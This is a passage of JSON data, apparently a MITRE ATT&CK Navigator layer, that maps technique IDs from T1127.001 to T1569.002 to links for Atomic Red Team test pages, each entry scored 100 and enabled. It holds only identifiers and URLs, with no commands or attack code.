abled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1133","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"},{"techniqueID":"T1134.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1136.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1137.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"},{"techniqueID":"T1140","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1197","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1202","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"},{"techniqueID":"T1204.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1204","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1207","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"},{"techniqueID":"T1216.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1218.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"},{"techniqueID":"T1219","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"},{"techniqueID":"T1220","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"},{"techniqueID":"T1221","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"},{"techniqueID":"T1222.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1482","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1486","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"},{"techniqueID":"T1489","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"},{"techniqueID":"T1490","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"},{"techniqueID":"T1491.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1491","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1496","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1505.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1531","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"},{"techniqueID":"T1543.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1543.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1546.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546.013","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546.014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1547.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1548.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1548.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1550.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1553.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1555.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"},{"techniqueID":"T1556.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1556","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1558.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1559.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1559","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1563.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1563","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1564.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"},{"techniqueID":"T1566.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1566","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1569.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1569.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniq